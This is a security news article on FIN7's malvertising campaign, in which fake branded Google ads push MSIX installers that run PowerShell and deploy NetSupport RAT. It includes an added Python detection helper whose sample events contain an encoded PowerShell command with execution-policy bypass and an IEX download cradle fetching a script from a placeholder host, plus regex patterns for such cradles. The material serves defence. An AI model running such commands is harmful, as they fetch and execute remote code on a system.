The financially motivated hacker group known as FIN7 has been observed using malicious Google ads that impersonate legitimate brands to distribute MSIX installers, which ultimately deploy NetSupport RAT, a remote access trojan that is by no means new to the threat landscape.
What are the goals of the FIN7 hacker group?
“Cybercriminals used malicious websites to impersonate well-known brands, including AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet,” cybersecurity firm eSentire said in a report released earlier this week.
FIN7 (also known as Carbon Spider and Sangria Tempest) is a hacker group responsible for various cybercrimes. Active since at least 2013, it initially carried out targeted attacks on point-of-sale (PoS) devices to steal payment data before moving on to breaching large companies through ransomware campaigns.
Over the years, the hacker group has refined its tactics and arsenal of malware, adopting various custom malware families such as BIRDWATCH, Carbanak, DICELOADER (aka Lizar and Tirion), POWERPLANT, POWERTRASH, and TERMITE, among others.
FIN7's malware is commonly delivered through spear-phishing campaigns that serve as the entry point into the target network or host, although in recent months the group has turned to malvertising to initiate its attack chains.
Microsoft statements regarding FIN7
In December 2023, Microsoft said it had observed attackers relying on Google ads to lure users into downloading malicious MSIX application bundles, which ultimately led to the execution of POWERTRASH, a PowerShell-based in-memory dropper used to load NetSupport RAT and Gracewire.
“Sangria Tempest […] is a group of financial cybercriminals currently focused on performing intrusions that often lead to data theft, followed by targeted extortion or the release of ransomware such as Clop ransomware,” the tech giant said at the time.
The abuse of MSIX as a malware distribution vector by various attackers, likely because it can bypass security mechanisms such as Microsoft Defender SmartScreen, prompted Microsoft to disable the associated protocol handler by default.
In attacks observed by eSentire in April 2024, users who reach the fake sites via Google ads are shown a pop-up message urging them to download a deceptive browser extension. The download is actually an MSIX file containing a PowerShell script, which collects system information and contacts a remote server to retrieve a second, encoded PowerShell script.
That second PowerShell payload is used to download and run NetSupport RAT from an attacker-controlled server.
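The chain described above leaves a recognisable trace on the endpoint: PowerShell launched from inside an installed MSIX package (packages are installed under the WindowsApps directory) with an encoded command line or a download cradle. The following triage helper is an added example, not code from eSentire or the article; the event field names and the sample events are constructed for illustration and loosely modelled on process-creation telemetry.

```python
import re

# Constructed sample process-creation events (not from the eSentire report).
# Field names are an assumption, loosely modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"pid": 100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    # Benign admin script: PowerShell, but not launched from an MSIX package
    {"pid": 101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    # Article's pattern: PowerShell spawned by an MSIX package (WindowsApps path)
    # running an encoded command (constructed package name and payload)
    {"pid": 102, "parent_image": r"C:\Program Files\WindowsApps\Fake.Extension_1.0.0.0_x64__abc\PackagedApp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAC4ALgAuACkA"},
    # Same parent, second stage fetched with a download cradle (constructed URL)
    {"pid": 103, "parent_image": r"C:\Program Files\WindowsApps\Fake.Extension_1.0.0.0_x64__abc\PackagedApp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
]

# -e / -ec / -enc / -EncodedCommand switches (PowerShell accepts prefixes)
ENCODED = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")
# Common in-memory download cradles used to fetch a second stage
CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient")


def is_powershell(image):
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def from_msix_package(path):
    # MSIX/AppX packages are installed under %ProgramFiles%\WindowsApps
    return "\\windowsapps\\" in path.lower()


def triage(events):
    """Return {pid: [reasons]} for PowerShell launched from an MSIX package
    that also shows an encoded command or a download cradle."""
    hits = {}
    for ev in events:
        if not (is_powershell(ev["image"]) and from_msix_package(ev["parent_image"])):
            continue
        reasons = ["powershell spawned from an MSIX package under WindowsApps"]
        if ENCODED.search(ev["cmdline"]):
            reasons.append("encoded command line")
        if CRADLE.search(ev["cmdline"]):
            reasons.append("download cradle in command line")
        if len(reasons) >= 2:  # require two signals to keep noise down
            hits[ev["pid"]] = reasons
    return hits
```

Requiring the package-parent signal plus a second one keeps ordinary packaged apps that legitimately call PowerShell from flooding the queue; tune the thresholds against your own telemetry.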
The Canadian cybersecurity firm also observed the remote access trojan being used to deliver additional malware, including DICELOADER via a Python script.
“The incidents of FIN7 exploiting trusted brand names and using deceptive web ads to distribute NetSupport RAT followed by DICELOADER highlight the ongoing threat, particularly with the abuse of signed MSIX files by these cyber criminals, which has proven effective in their patterns,” eSentire said.
Over to Malwarebytes
Similar findings have been independently reported by Malwarebytes, which characterized the activity as targeting enterprise users via malicious ads and modals mimicking high-profile brands such as Asana, BlackRock, CNN, Google Meet, SAP, and The Wall Street Journal. However, it did not attribute the campaign to FIN7.
News of FIN7’s malvertising campaign coincides with a wave of SocGholish (also known as FakeUpdates) infections designed to target business partners.
“Attackers used ‘living-off-the-land’ techniques to collect sensitive credentials and, in particular, configured web beacons in both email signatures and network shares to map local and inter-company relationships,” eSentire said. “This behavior would suggest an interest in leveraging these relationships to target business peers of interest.”
It also follows the discovery of a malware campaign targeting Windows and Microsoft Office users to propagate RATs and cryptocurrency miners via cracks for popular software.
“Malware, once installed, often records commands in the task scheduler to maintain persistence, allowing continued installation of new malware even after removal,” Symantec, owned by Broadcom, said.